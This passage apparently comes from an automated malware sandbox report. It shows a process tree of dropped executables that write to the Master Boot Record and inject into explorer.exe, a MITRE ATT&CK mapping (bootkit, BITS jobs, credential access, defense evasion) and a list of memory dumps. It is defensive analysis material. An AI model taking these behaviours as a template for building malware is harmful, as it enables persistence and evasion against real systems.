        5⤵
        
        PID:9192
- - C:\Users\Admin\AppData\Local\b53ee96b-d72a-4c81-aa6f-63cbae4291da\updatewin2.exe
    "C:\Users\Admin\AppData\Local\b53ee96b-d72a-4c81-aa6f-63cbae4291da\updatewin2.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    PID:3624
- - C:\Users\Admin\AppData\Local\b53ee96b-d72a-4c81-aa6f-63cbae4291da\5.exe
    "C:\Users\Admin\AppData\Local\b53ee96b-d72a-4c81-aa6f-63cbae4291da\5.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:2500
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2500 -s 540
      4⤵
      Program crash
      PID:9200

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:3552

C:\Users\Admin\AppData\Local\Temp\6A4C.exe
C:\Users\Admin\AppData\Local\Temp\6A4C.exe
1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:3660

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:3720

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:3716

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:3948

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1812

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4004

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

BITS Jobs

T1197

Bootkit

T1067

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/308-60-0x0000000075A31000-0x0000000075A33000-memory.dmp

Filesize
8KB

Download
memory/308-61-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/368-75-0x0000000001FC0000-0x0000000001FC2000-memory.dmp

Filesize
8KB

Download
memory/868-109-0x0000000002160000-0x0000000002162000-memory.dmp

Filesize
8KB

Download
memory/880-79-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1000-90-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/1000-87-0x0000000074D11000-0x0000000074D13000-memory.dmp

Filesize
8KB

Download
memory/1104-117-0x0000000001ED6000-0x0000000001EF5000-memory.dmp

Filesize
124KB

Download
memory/1104-107-0x000007FEF2760000-0x000007FEF37F6000-memory.dmp

Filesize
16.6MB

Download
memory/1104-110-0x0000000001ED0000-0x0000000001ED2000-memory.dmp

Filesize
8KB

Download
memory/1164-224-0x00000000001B0000-0x00000000001BC000-memory.dmp

Filesize
48KB

Download
memory/1264-239-0x0000000002A40000-0x0000000002A55000-memory.dmp

Filesize
84KB

Download
memory/1264-237-0x0000000002A10000-0x0000000002A27000-memory.dmp

Filesize
92KB

Download
memory/1324-311-0x0000000000630000-0x0000000000631000-memory.dmp

Filesize
4KB

Download
memory/1456-113-0x000007FEFC661000-0x000007FEFC663000-memory.dmp

Filesize
8KB

Download
memory/1928-108-0x00000000005C0000-0x00000000005C2000-memory.dmp

Filesize
8KB

Download
memory/1928-101-0x000007FEF2760000-0x000007FEF37F6000-memory.dmp

Filesize
16.6MB

Download
memory/1928-118-0x000000001B0E0000-0x000000001B0F9000-memory.dmp

Filesize
100KB

Download
memory/1928-120-0x00000000005C6000-0x00000000005E5000-memory.dmp

Filesize
124KB

Download
memory/1928-121-0x00000000005E5000-0x00000000005E6000-memory.dmp

Filesize
4KB

Download
memory/1984-70-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/3408-290-0x00000000045F2000-0x00000000045F3000-memory.dmp

Filesize
4KB

Download
memory/3408-289-0x00000000045F0000-0x00000000045F1000-memory.dmp

Filesize
4KB

Download
memory/3412-277-0x00000000048C0000-0x00000000048C1000-memory.dmp

Filesize
4KB

Download
memory/3412-278-0x00000000048C2000-0x00000000048C3000-memory.dmp

Filesize
4KB

Download
memory/3472-295-0x00000000047A0000-0x00000000047A1000-memory.dmp

Filesize
4KB

Download
memory/3472-296-0x00000000047A2000-0x00000000047A3000-memory.dmp

Filesize
4KB

Download
memory/3480-292-0x0000000002280000-0x0000000002ECA000-memory.dmp

Filesize
12.3MB

Download
memory/3508-297-0x00000000049F0000-0x00000000049F1000-memory.dmp

Filesize
4KB

Download
memory/3508-298-0x00000000049F2000-0x00000000049F3000-memory.dmp

Filesize
4KB

Download
memory/3944-206-0x0000000000240000-0x0000000000250000-memory.dmp

Filesize
64KB

Download
memory/3944-207-0x00000000002F0000-0x0000000000302000-memory.dmp

Filesize
72KB

Download
memory/4884-271-0x0000000004A30000-0x0000000004A31000-memory.dmp

Filesize
4KB

Download
memory/4884-269-0x0000000000C50000-0x0000000000C51000-memory.dmp

Filesize
4KB

Download
memory/4884-272-0x0000000004A32000-0x0000000004A33000-memory.dmp

Filesize
4KB

Download
memory/7628-137-0x0000000000140000-0x00000000001D0000-memory.dmp

Filesize
576KB

Download
memory/7712-265-0x00000000054E0000-0x00000000054E1000-memory.dmp

Filesize
4KB

Download
memory/7712-266-0x00000000062B0000-0x00000000062B1000-memory.dmp

Filesize
4KB

Download
memory/7712-264-0x0000000002470000-0x00000000030BA000-memory.dmp

Filesize
12.3MB

Download
memory/7712-263-0x0000000002470000-0x00000000030BA000-memory.dmp

Filesize
12.3MB

Download
memory/7712-262-0x0000000002790000-0x0000000002791000-memory.dmp

Filesize
4KB

Download
memory/7712-261-0x0000000004C30000-0x0000000004C31000-memory.dmp

Filesize
4KB

Download
memory/7712-260-0x0000000002470000-0x0000000002471000-memory.dmp

Filesize
4KB

Download
memory/7816-248-0x0000000006380000-0x0000000006381000-memory.dmp

Filesize
4KB

Download
memory/7816-233-0x0000000004760000-0x0000000004761000-memory.dmp

Filesize
4KB

Download
memory/7816-238-0x0000000005260000-0x0000000005261000-memory.dmp

Filesize
4KB

Download
memory/7816-242-0x0000000006120000-0x0000000006121000-memory.dmp

Filesize
4KB

Download
memory/7816-247-0x0000000006200000-0x0000000006201000-memory.dmp

Filesize
4KB

Download
memory/7816-232-0x0000000000CE0000-0x0000000000CE1000-memory.dmp

Filesize
4KB

Download
memory/7816-255-0x0000000006340000-0x0000000006341000-memory.dmp

Filesize
4KB

Download
memory/7816-256-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/7816-257-0x0000000006700000-0x0000000006701000-memory.dmp

Filesize
4KB

Download
memory/7816-236-0x0000000002690000-0x0000000002691000-memory.dmp

Filesize
4KB

Download
memory/7816-235-0x0000000000D80000-0x0000000000E6D000-memory.dmp

Filesize
948KB

Download
memory/7816-234-0x0000000000D80000-0x0000000000E6D000-memory.dmp

Filesize
948KB

Download
memory/7824-220-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/7908-229-0x0000000000400000-0x000000000045B000-memory.dmp

Filesize
364KB

Download
memory/7908-228-0x0000000000220000-0x0000000000229000-memory.dmp

Filesize
36KB

Download
memory/8524-293-0x0000000004840000-0x0000000004841000-memory.dmp

Filesize
4KB

Download
memory/8524-294-0x0000000004842000-0x0000000004843000-memory.dmp

Filesize
4KB

Download
memory/8532-128-0x0000000000270000-0x0000000000282000-memory.dmp

Filesize
72KB

Download
memory/8532-127-0x0000000000240000-0x0000000000250000-memory.dmp

Filesize
64KB

Download
memory/9348-280-0x00000000048A0000-0x00000000048A1000-memory.dmp

Filesize
4KB

Download
memory/9348-281-0x00000000048A2000-0x00000000048A3000-memory.dmp

Filesize
4KB

Download
memory/9456-299-0x00000000049B0000-0x00000000049B1000-memory.dmp

Filesize
4KB

Download
memory/9456-300-0x00000000049B2000-0x00000000049B3000-memory.dmp

Filesize
4KB

Download
memory/9564-303-0x0000000004B50000-0x0000000004B51000-memory.dmp

Filesize
4KB

Download
memory/9564-304-0x0000000004B52000-0x0000000004B53000-memory.dmp

Filesize
4KB

Download
memory/9576-301-0x0000000004A20000-0x0000000004A21000-memory.dmp

Filesize
4KB

Download
memory/9576-302-0x0000000004A22000-0x0000000004A23000-memory.dmp

Filesize
4KB

Download
memory/9588-284-0x0000000004A52000-0x0000000004A53000-memory.dmp

Filesize
4KB

Download
memory/9588-283-0x0000000004A50000-0x0000000004A51000-memory.dmp

Filesize
4KB

Download
memory/9612-307-0x000000001AC10000-0x000000001AC12000-memory.dmp

Filesize
8KB

Download
memory/9612-308-0x000000001AC14000-0x000000001AC16000-memory.dmp

Filesize
8KB

Download
memory/9684-306-0x000000001AD24000-0x000000001AD26000-memory.dmp

Filesize
8KB

Download
memory/9684-305-0x000000001AD20000-0x000000001AD22000-memory.dmp

Filesize
8KB

Download
memory/9908-287-0x00000000048D2000-0x00000000048D3000-memory.dmp

Filesize
4KB

Download
memory/9908-286-0x00000000048D0000-0x00000000048D1000-memory.dmp

Filesize
4KB

Download
memory/9920-312-0x0000000000160000-0x00000000001D4000-memory.dmp

Filesize
464KB

Download
memory/9920-313-0x00000000000F0000-0x000000000015B000-memory.dmp

Filesize
428KB

Download
memory/9932-314-0x0000000000330000-0x00000000003C1000-memory.dmp

Filesize
580KB

Download
memory/9984-309-0x0000000000400000-0x000000000043E000-memory.dmp

Filesize
248KB

Download
memory/10056-315-0x00000000000F0000-0x00000000000F7000-memory.dmp

Filesize
28KB

Download
memory/10096-310-0x0000000007070000-0x0000000007071000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads